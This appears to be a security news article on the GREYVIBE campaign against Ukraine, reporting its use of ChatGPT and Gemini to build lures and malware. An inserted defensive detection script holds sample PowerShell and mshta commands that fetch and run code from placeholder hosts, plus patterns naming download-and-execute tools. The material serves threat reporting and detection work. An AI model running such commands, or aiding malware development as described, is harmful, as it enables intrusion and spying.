
GREYVIBE Hackers Leverage ChatGPT and Google Gemini to Fuel Cyberattacks

GREYVIBE hackers are increasingly leveraging generative AI tools such as ChatGPT and Google Gemini to enhance cyberattack operations.

The campaign, active since at least August 2025, primarily targets Ukraine and related entities across the government, military, and civilian sectors, highlighting a growing convergence between artificial intelligence and modern cyber warfare.

WithSecure researchers identified GREYVIBE as a previously untracked threat group exhibiting consistent overlaps in infrastructure, tooling, and operational behavior across multiple campaigns.

While no definitive attribution has been established, the group’s activities strongly align with Russian state interests, particularly intelligence-gathering objectives linked to the ongoing Russia-Ukraine conflict.

Supporting evidence includes Russian-language artifacts, Moscow time zone activity patterns, and targeting aligned with Ukrainian institutions.

GREYVIBE Abuses ChatGPT, Gemini AI

GREYVIBE employs a multi-vector attack strategy, combining spear-phishing emails, fake CAPTCHA verification pages, and fraudulent websites to distribute malware.

In spear-phishing campaigns, attackers impersonate Ukrainian government agencies and distribute malicious archives via cloud services such as Google Drive.

The archives open a decoy document while a custom loader silently starts the infection chain.

Another notable tactic is fake CAPTCHA pages that instruct the victim to run attacker-supplied commands themselves, presented as verification steps.
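To make the fake-CAPTCHA tactic concrete from the defender's side, the following is an added detection example written for this article; it is not code from WithSecure's report or from any GREYVIBE tool. It assumes the common "ClickFix" variant of the lure (the page tells the victim to press Win+R and paste a clipboard command, so the first malicious process is a script host spawned by explorer.exe), which the article does not confirm for GREYVIBE specifically. Field names follow Sysmon process-creation events, the log records are constructed, and the hostnames under example.invalid are placeholders.

```python
"""Heuristic detection for fake-CAPTCHA ("ClickFix"-style) execution chains.

Added example; not code from WithSecure's report or the GREYVIBE toolset.
Assumption: the lure has the victim paste a command into the Run dialog, so
the first malicious process is a script host spawned by explorer.exe with a
hidden window and a remote payload fetch. Records are constructed JSON lines
using Sysmon Event ID 1 field names.
"""
import json
import re

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}
RUN_DIALOG_PARENTS = {"explorer.exe"}   # Win+R commands are spawned by explorer.exe
BROWSER_PARENTS = {"chrome.exe", "msedge.exe", "firefox.exe"}

# Each entry is one indicator; the score is the number of indicators that fire.
ARG_INDICATORS = [
    ("hidden window", re.compile(r"-(w|win|window|windowstyle)\s+hidden", re.I)),
    ("encoded command", re.compile(r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("remote fetch", re.compile(r"(iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|curl\s|wget\s|certutil.*-urlcache)", re.I)),
    ("in-memory execution", re.compile(r"\biex\b|invoke-expression", re.I)),
    ("URL in arguments", re.compile(r"https?://", re.I)),
]

# Constructed process-creation records (JSON lines); not real telemetry.
SAMPLE_LOG = [
    r'{"ProcessId": 1001, "Image": "C:\\Windows\\notepad.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "notepad.exe"}',
    # A user opening a PowerShell console from the Start menu: one indicator only.
    r'{"ProcessId": 1002, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe"}',
    # A maintenance script launched from cmd.exe: no indicators.
    r'{"ProcessId": 1003, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"}',
    # The fake-CAPTCHA chain: pasted into Win+R, hidden window, fetch-and-eval of a remote script.
    r'{"ProcessId": 4412, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe -w hidden -c \"iwr http://captcha-check.example.invalid/v.txt | iex\""}',
    # A variant that hands a remote HTA to mshta.exe instead.
    r'{"ProcessId": 4413, "Image": "C:\\Windows\\System32\\mshta.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "mshta.exe https://verify.example.invalid/step2.hta"}',
]


def parse_event(line):
    """Parse one JSON-lines process-creation record into a dict."""
    return json.loads(line)


def _basename(path):
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return (score, reasons) for one process-creation event."""
    image = _basename(ev.get("Image", ""))
    parent = _basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    reasons = []
    if image not in SCRIPT_HOSTS:
        return 0, reasons
    if parent in RUN_DIALOG_PARENTS:
        reasons.append("script host spawned by explorer.exe (Run dialog / shell)")
    elif parent in BROWSER_PARENTS:
        reasons.append("script host spawned directly by a browser")
    for name, pattern in ARG_INDICATORS:
        if pattern.search(cmd):
            reasons.append(name)
    return len(reasons), reasons


def detect(lines, threshold=2):
    """Return the events whose indicator count reaches the threshold.

    A single indicator (e.g. a user launching PowerShell from the Start menu)
    is not reported; the chain needs a suspicious parent plus suspicious
    arguments, or several suspicious arguments, to be flagged.
    """
    hits = []
    for line in lines:
        ev = parse_event(line)
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({"pid": ev.get("ProcessId"), "score": score,
                         "reasons": reasons, "cmd": ev.get("CommandLine", "")})
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_LOG):
        print(f"PID {hit['pid']} score={hit['score']}: {', '.join(hit['reasons'])}")
        print(f"    {hit['cmd']}")
```

Run against the constructed records, only the two Run-dialog chains (PIDs 4412 and 4413) are reported; the interactive PowerShell console from explorer.exe scores one indicator and stays below the threshold, which is the false-positive case any such rule has to tolerate. In production the same logic maps directly onto a SIEM query over process-creation telemetry, with the parent-process relationship doing most of the work.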

Additionally, the group operates deceptive “adult club” websites targeting Ukrainian individuals, particularly military personnel.

Example of fake CAPTCHA site and prompted instructions (Ukrainian). Source: WithSecure Labs.

These platforms not only deliver malware such as FallSpy for Android and PhantomRelay for Windows, but also engage in social engineering through fake personas on messaging platforms like Telegram.

A key finding in the report is GREYVIBE’s systematic use of generative AI across the attack lifecycle.

Tools such as ChatGPT, Google Gemini, and Ideogram AI were reportedly used to generate phishing lures, develop malware components, and support post-compromise activities.

Researchers observed AI-generated code patterns in obfuscators and loaders such as DAYLIGHT and TEASOUP, as well as in the development of LegionRelay, a custom PowerShell-based remote access trojan.

This AI-assisted approach appears to help the group compensate for limited technical sophistication while accelerating development cycles.

It also reduces code reuse across samples, which weakens attribution methods that rely on matching shared code between campaigns. However, the group's reliance on AI has introduced flaws.

WithSecure identified design weaknesses in LegionRelay that exposed backend functionality, enabling researchers to monitor attacker activity over time.

Examples of LLM markers present across images used by GREYVIBE. Source: WithSecure Labs.

GREYVIBE’s malware toolkit includes PhantomRelay, a modular RAT that uses WebSockets for command execution, and FallSpy, an Android spyware that exfiltrates sensitive data, including contacts, location, and device information.

LegionRelay adds file theft, screenshot capture, and exfiltration of messaging-app data to that toolkit.

Despite its effectiveness, GREYVIBE demonstrates signs of operational immaturity. Researchers noted poor operational security practices, including uploading test samples to public platforms and inconsistent tooling.

At the same time, overlaps with known cybercrime infrastructure suggest possible links to former or active cybercriminal actors, indicating a hybrid threat model.

The emergence of GREYVIBE underscores how generative AI is reshaping the threat landscape. By lowering technical barriers and enabling rapid tool development, AI is empowering even moderately skilled actors to conduct complex cyber operations, complicating detection, attribution, and defense efforts.

Source: Cyber Security News (cybersecuritynews.com)
